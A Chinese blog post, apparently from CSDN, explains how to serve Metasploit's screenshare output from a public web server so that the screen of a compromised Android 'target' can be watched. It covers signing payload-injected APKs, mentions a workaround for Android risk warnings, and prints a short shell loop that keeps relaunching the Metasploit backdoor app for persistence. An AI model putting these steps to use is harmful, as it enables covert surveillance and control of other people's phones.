关于在服务器上启用metasploit如何使用后渗透命令screenshare进行屏幕共享的方法

于 2022-08-26 00:24:25 发布
阅读量2k 收藏 4
点赞数
分类专栏: MSF metasploit小白进阶 文章标签: android ios 系统安全 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/github_69216388/article/details/126534969
版权

通常我们为了方便测试,都是在本地虚拟机内安装kali系统
这样有利于我们降低环境部署的难度
特别是对于新手来说,
针对安卓apk需要的注入功能需要用到apktool
证书的生成需要用到keytool
签名需要调用jarsigner
有时候你明明配置了不生效可以直接把对应目录创建软连接到全局变量目录下
如将JDK的bin目录创建软连接到全局变量目录
ln -s /opt/jdk-18.0.2.1/bin/ /usr/local/bin/
如生成key命令
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

----言归正传------
但是靶机安装运行成功后,需要有个外网ip对目标进行监听
像我这样在自己服务器上安装metasploit对靶机进行监听的时候就会有个问题
如何使用后渗透命令screenshare进行屏幕共享
我采用的方法是创建一个站点,使用cd命令该站点的可访问页面目录下(如www/wwwroot/www.zhazhahui.com)下执行msfconsole
设置完相关选项后run启动
那么当使用screenshare命令后产生的监听页面就会生成在可访问页面下/dfgdgbfeb.html
在保证www.zhazhahui.com可访问的前提下
此时访问www.zhazhahui.com/dfgdgbfeb.html
即可查看靶机的屏幕共享,当然我用的是静态页面所以需要不断刷新,
你可以尝试下使用伪静态页面尝试或者其他更高级的办法,
-----------
另外风险提示问题的问题已得到通用的解决办法(已在android10系统上测试),
未解决问题:
默认开启的权限较少,
另外一个注入后后渗透上传的自启动shell脚本没有足够的权限,
还有自启动shell内对应包名和MainActivity启动的问题

将下面5行保存为zha.sh即是原装的MainActivity后门自启动shell
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

---------------------------

另外需要大佬指点针对ios系统生成的的可执行文件如何执行,

反正不是点击一下也不是ipa或者其他分发下载的形式

新人新帖欢迎大家踊跃讨论

波波波旬
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
screen_share:将您的桌面屏幕共享给基于Web的客户端
04-27
screen_share 将您的桌面屏幕共享到基于Web的客户端。 使用嵌入式Web服务器或远程Web服务器。 程序用于远程Web服务器屏幕共享。 关于 它使用JavaCV访问FFmpeg来捕获屏幕,并使用libx264进行h264编码。 然后在浏览器中,它使用Broadway进行javascript h264解码。 使用WebSocket进行传输。 Jetty用于嵌入式Web服务器/ WebSocket服务器。 这仅是视频(无音频),不适用于任何高fps的内容,例如电影/游戏等。仅用于简单的桌面共享。 高fps对于浏览器(javascript / Broadway)可能会占用大量资源。 使用远程共享时,将使用密码,以便远程可以对screen_share进行身份验证。 并且需要在screen_share中输入远程TLS证书的指纹。 因此,您知道您正在连接到您认为要连接的远程设备,而
desktop-screen-share:桌面屏幕共享的简单解决方案
06-25
桌面屏幕共享 桌面屏幕共享的简单解决方案。 目前,它仅适用于 Mac。 欢迎请求请求使其在其他平台上工作。(提示:要使其在其他平台上工作,您只需要找到命令行实用程序来捕获桌面屏幕截图。) 运行,$ node server.js
Mac 远程 屏幕共享 screen sharing
如需协助请去我博客
06-28 2111
Mac 远程 屏幕共享 screen sharing
ScreenCatJavaScript实现的屏幕共享和远程协作应用
08-11
JavaScript实现的屏幕共享和远程协作应用
ScreenShared:screen在其他设备上共享屏幕screen
05-26
屏幕共享 ScreenShared是我们在空闲时间建立的东西 该项目的想法是通过互联网连接在另一个屏幕共享您的屏幕 :smiling_face_with_sunglasses: 您要在另一台设备上共享屏幕吗? ScreenShared非常简单。 您只有创建一个帐户并登录,登录后选择“ :laptop: 分享”以共享您的屏幕或选择“ :desktop_computer: 连接”以显示您的信息流。
metasploit使用lnk漏洞渗透测试.doc
03-18
Metasploit使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍...
关于Metasploit Framework与渗透测试相关知识
最新发布
12-28
使用Metasploit进行渗透测试时,必须遵守道德和法律规定,只在授权的情况下对目标系统进行测试,并确保测试不会对生产环境造成破坏。 总结,Metasploit Framework是渗透测试者的重要武器,它的强大功能和灵活扩展...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
本指南将深入探讨Metasploit使用方法,帮助读者理解如何有效地进行渗透测试。 Metasploit框架是一个综合的渗透测试平台,它提供了大量的模块,包括漏洞利用、扫描、后渗透工具等。这些模块使得安全专家能够快速地...
metasploit常用渗透命令.zip
09-16
本资料“metasploit常用渗透命令”主要聚焦于Metasploit框架中的常用命令,帮助用户理解和掌握其核心功能。 在Metasploit框架中,主要涉及以下几个关键概念: 1. **Meterpreter**:Meterpreter是一种动态的、功能...
基于metasploit框架的渗透测试方法研究
12-15
1. **兼容性**:Metasploit支持多种操作系统,如Windows、Linux、Mac OS等,允许在不同环境中进行渗透测试。 2. **扩展性**:Metasploit有一个庞大的模块库,包含各种预编写好的攻击脚本,用户也可以自定义开发新的...
屏幕分享Screen Share」-crx插件
03-23
捕获全屏或特定应用程序的屏幕 这个扩展程序允许用户与客户服务代表共享屏幕上的内容。 支持语言:English
screenshare apk
08-28
screenshare 一个屏幕共享软件。
screenshot-service, 使用phantomJS无头浏览器作为服务的屏幕截图.zip
09-18
screenshot-service, 使用phantomJS无头浏览器作为服务的屏幕截图 屏幕截图服务使用phantomJS无头浏览器作为服务的屏幕截图这是一个小工具,它使得web服务能够呈现任何页面的屏幕截图。 归功于 @trevordixon,他的出色表达像路由器 。用法假设你已经安装了 phantomJs插件
基于QT设计的屏幕共享软件(采用HTTP协议传输,只要有浏览器就可以访问)
06-02
基于QT+HTTP协议设计的屏幕共享软件(完整源码),多线程并发。 资源包含的是完整的源码工程,下载下来就可以编译运行(要注意将源码目录下的www目录拷贝到编译后生成的exe同级目录下)。 当前软件是基于Qt设计的一个桌面同屏(也就是屏幕画面共享软件),利用Qt搭建一个HTTP服务器,处理浏览器的请求,当浏览器访问过来时,就将本地采集到的电脑画面发送给浏览器,与浏览器建立长连接通信,直接传输JPG图片,实现屏幕画面同屏效果。支持登录页面,做了一个账号登录界面,访问服务器之后需要输入账号密码才可以正常进入服务器查看共享的画面。服务器采用多线程并发方式,支持同时处理多个浏览器的访问。 在一个局域网内,如果想开个会,一个办公室开个会,会议主持者分享屏幕,那是非常的方便的,参会成员只需要浏览器里输入服务器的IP地址登录进去就可以看画面了,比投影仪看的更加清楚,也不用腾讯会议(这需要外网),因为应用场景是办公室内开会使用,所以也不存在语音传输的情况,需求就是:共享电脑画面。
screenshot-as-a-service, 由 node.js 和phantomjs提供的网站截图服务.zip
09-18
screenshot-as-a-service, 由 node.js 和phantomjs提供的网站截图服务 屏幕截图作为服务通过 Express 和 PhantomJS简单的屏幕截图。 来自屏幕截图应用程序 。设置首先安装,然后克隆这里 repo 并安装: $ npm install 运行该应用程序:$ n
meterpreter 监控桌面命令(screenshare)
weixin_44257023的博客
03-05 2655
meterpreter 监控桌面命令如下 在练习使用 msf 渗透框架玩耍时,无论是正向还是返向 shell 控制端一般都是这个 meterpreter > ,那么如何动态监控靶机现在正在看什么那? 只用 screenshare 命令监控桌面 screenshare 执行命令如图: 使用命令之后会自动打开浏览器,并在如上图的 /root/生成了两个文件 监控画面如下: ...
Android Screen Share And Control
怪咖先森的博客
10-10 438
记录下: https://github.com/android-notes/androidScreenShareAndControl
无须安装插件的远程桌面共享(screen sharing)实现方案
xu的blog
12-31 7057
导读:   下一下项目就是这个了,先说一下主要实现什么功能   应用环境:   只有知道了这个东西要在什么地方用,才可以清楚他为什么会有这些功能,这个项目主要是用来公司的设计人员把3D的模型角色展示给客户看的,客户在网页上选择好角色(网页有一个程序来给客户自己配置自己喜欢的角色,但是他是二维展示的),然后就可以去看一下这个模型真实的样式,这时这个桌面共享共享设计人员的桌面(可能也只是其中
demo-screenshare:屏幕共享的简单演示,使您可以将流广播到远程端点
05-07
rtc.io屏幕共享演示(已屏蔽) 这是一个相当简单的演示,展示了如何使用软件包与远程参与者共享屏幕。 在本地运行演示 准备 首先,克隆此存储库: git clone https://github.com/rtc-io/demo-screenshare.git 下一个安装依赖项: cd demo-screenshare npm install 现在,安装一些其他命令行工具,这些工具将在开发过程中为我们提供帮助: npm install browserify beefy st -g 好的,这有点棘手,因为在运行演示之前,我们目前有两个要求: 我们需要从HTTPS运行本地演示,以便在Chrome中允许屏幕共享。 为使扩展正常工作,我们需要以*.rtc.io站点的身份访问演示服务器。 如果您在本地计算机上使用nginx,则可以使用来帮助配置本地nginx服务器,以将HTTPS通信代
Metasploit渗透测试教程:从情报收集到后渗透攻击
Metasploit中,exploit是利用漏洞进行攻击的工具,而payload是攻击成功后在目标系统上执行的代码。例如,反弹shell使目标主机连接回攻击者的主机,提供命令行控制;bind shell则在目标主机上开启一个等待连接的...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

波波波旬

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值